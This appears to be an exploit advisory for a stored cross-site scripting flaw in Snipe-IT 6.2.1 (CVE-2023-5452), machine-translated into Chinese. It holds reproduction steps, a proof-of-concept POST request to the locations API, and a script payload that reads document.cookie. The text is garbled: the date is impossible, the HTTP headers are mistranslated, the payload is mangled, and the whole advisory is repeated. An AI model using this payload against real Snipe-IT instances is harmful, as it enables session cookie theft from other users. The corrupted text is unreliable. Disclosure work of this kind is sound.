利用标题: Snipeit 6.2.1-存储的跨站点脚本
日期: 06-OCT-20123
剥削作者: Shahzaib Ali Khan
供应商HomePage: https://snipeitapp.com
软件link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1
版本: 6.2.1
在: Windows 11 22H2和Ubuntu测试20.04
CVE: CVE-2023-5452
Description: Snipeit 6.2.1受存储的跨站点脚本的影响
(XSS)允许攻击者执行JavaScript命令的功能。这
位置端点很脆弱。
复制步骤:
1。登录标准用户[非ADMIN]资产页面列表全部
2。单击以打开任何资产编辑资产
3。创建新位置并添加payload:
ScriptTalet(document.cookie)/脚本
4。现在登录到任何其他非应用程序或管理资产页面列表全部
5。打开可以更改位置和有效载荷的相同资产
将被执行。
POC请求:
POST/API/V1/位置HTTP/1.1
HOST: LOCALHOST
内容长度: 118
ACCEPT: /
X-CSRF-TOKEN3360 CDJKVGNWZFKFKFKFUEENX0AQMJIHHXJGZMKG1SFEVEGV
X-重新要求- WITH: XMLHTTPREQUEST
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36
(Khtml,像壁虎一样)Chrome/117.0.5938.63 Safari/537.36
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
Origin: http://localhost
Referer: http://localhost/Hardware/196/编辑
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
cookie: snipeit_session=ahw3arn6pdg90xu4ovg1fbzywyckplixjtufmelo;
AssetSlistingTable.bs.table.cardview=false; laravel_token=
eyjpdii6iitpm1rxvevvevgnlzzrtd28wymhzble9psisinzhbhvlijoickjocmnytznos3jydkdkdh smpjme1grmjymi9dunvkastdtzbnbhzdvg1xnvavbta5cjjjhm1ftbi95sevznmnnzdknhy5em5pk3
ZJQ2F3VNB6RNHJRCS4NKV6NW16RNRWB3M0CXBUT2ZPZEXOQ3JRN1VIVHB3CWV5CWV5NETBRWZ4OXBSDEX 4R0HSEELLV1BEBWK2WGXIWEBOMDG5CGFYSJ1RSNENCKX3BXG2QI9KQZFVNGJJTKTKTKTKTKTKJTVUW0EII4YVNM
d2uxdw1telbdv1byuk9yetfoudr1cs9sv2tfri9log1izgvweuxjdghhtxrlsnfvtu82qvivrephs 215BKRTKZM5M1RVQ21NVENST1MN1FUT1TBFKOVDVPBHD4A3BFQW1YQKY3NFR2BZRQSGSGZIELPPPA0
01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;
XSRF-TOKEN=
eyjpdii6ijnmmvpnuepdnctpv0phkoczzdrsumc9psisinzhbhvlijoiwxyvzky2btk4monsuufzq jzivwtpdm1jre1wwmpbd2tszwnjblgxzwg3donyl2x0zkxib3n5y1n5ymryvm1xum91n3pes1f1bh
FWMEV1Y2XSZ1VQZ1FYDMDYCJJRZXZMZG9NYMPWY2HTL2TPDXNBQUDEBJVHSEVJVJV2TZKOPYELELCJ tywmi0iii1yzhknmq2ndaxnmzkytq1nzvhzmi5ogy3oda3oda3mdkootc4zwvhymmizmizwiymjzhzgzgzizwi5
mjmomgjjzdbknzu4iiiiwidgfnijoiin0%3D
连接:关闭
名称=%3CScript%3ealert(document.cookie)%3C%2fscript%3ECITY=%3CScript%3ealert(document.cookie)%3C%2FScript%3CONTRITY=
谢谢,
Shahzaib Ali Khan
日期: 06-OCT-20123
剥削作者: Shahzaib Ali Khan
供应商HomePage: https://snipeitapp.com
软件link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1
版本: 6.2.1
在: Windows 11 22H2和Ubuntu测试20.04
CVE: CVE-2023-5452
Description: Snipeit 6.2.1受存储的跨站点脚本的影响
(XSS)允许攻击者执行JavaScript命令的功能。这
位置端点很脆弱。
复制步骤:
1。登录标准用户[非ADMIN]资产页面列表全部
2。单击以打开任何资产编辑资产
3。创建新位置并添加payload:
ScriptTalet(document.cookie)/脚本
4。现在登录到任何其他非应用程序或管理资产页面列表全部
5。打开可以更改位置和有效载荷的相同资产
将被执行。
POC请求:
POST/API/V1/位置HTTP/1.1
HOST: LOCALHOST
内容长度: 118
ACCEPT: /
X-CSRF-TOKEN3360 CDJKVGNWZFKFKFKFUEENX0AQMJIHHXJGZMKG1SFEVEGV
X-重新要求- WITH: XMLHTTPREQUEST
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36
(Khtml,像壁虎一样)Chrome/117.0.5938.63 Safari/537.36
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
Origin: http://localhost
Referer: http://localhost/Hardware/196/编辑
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
cookie: snipeit_session=ahw3arn6pdg90xu4ovg1fbzywyckplixjtufmelo;
AssetSlistingTable.bs.table.cardview=false; laravel_token=
eyjpdii6iitpm1rxvevvevgnlzzrtd28wymhzble9psisinzhbhvlijoickjocmnytznos3jydkdkdh smpjme1grmjymi9dunvkastdtzbnbhzdvg1xnvavbta5cjjjhm1ftbi95sevznmnnzdknhy5em5pk3
ZJQ2F3VNB6RNHJRCS4NKV6NW16RNRWB3M0CXBUT2ZPZEXOQ3JRN1VIVHB3CWV5CWV5NETBRWZ4OXBSDEX 4R0HSEELLV1BEBWK2WGXIWEBOMDG5CGFYSJ1RSNENCKX3BXG2QI9KQZFVNGJJTKTKTKTKTKTKJTVUW0EII4YVNM
d2uxdw1telbdv1byuk9yetfoudr1cs9sv2tfri9log1izgvweuxjdghhtxrlsnfvtu82qvivrephs 215BKRTKZM5M1RVQ21NVENST1MN1FUT1TBFKOVDVPBHD4A3BFQW1YQKY3NFR2BZRQSGSGZIELPPPA0
01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;
XSRF-TOKEN=
eyjpdii6ijnmmvpnuepdnctpv0phkoczzdrsumc9psisinzhbhvlijoiwxyvzky2btk4monsuufzq jzivwtpdm1jre1wwmpbd2tszwnjblgxzwg3donyl2x0zkxib3n5y1n5ymryvm1xum91n3pes1f1bh
FWMEV1Y2XSZ1VQZ1FYDMDYCJJRZXZMZG9NYMPWY2HTL2TPDXNBQUDEBJVHSEVJVJV2TZKOPYELELCJ tywmi0iii1yzhknmq2ndaxnmzkytq1nzvhzmi5ogy3oda3oda3mdkootc4zwvhymmizmizwiymjzhzgzgzizwi5
mjmomgjjzdbknzu4iiiiwidgfnijoiin0%3D
连接:关闭
名称=%3CScript%3ealert(document.cookie)%3C%2fscript%3ECITY=%3CScript%3ealert(document.cookie)%3C%2FScript%3CONTRITY=
谢谢,
Shahzaib Ali Khan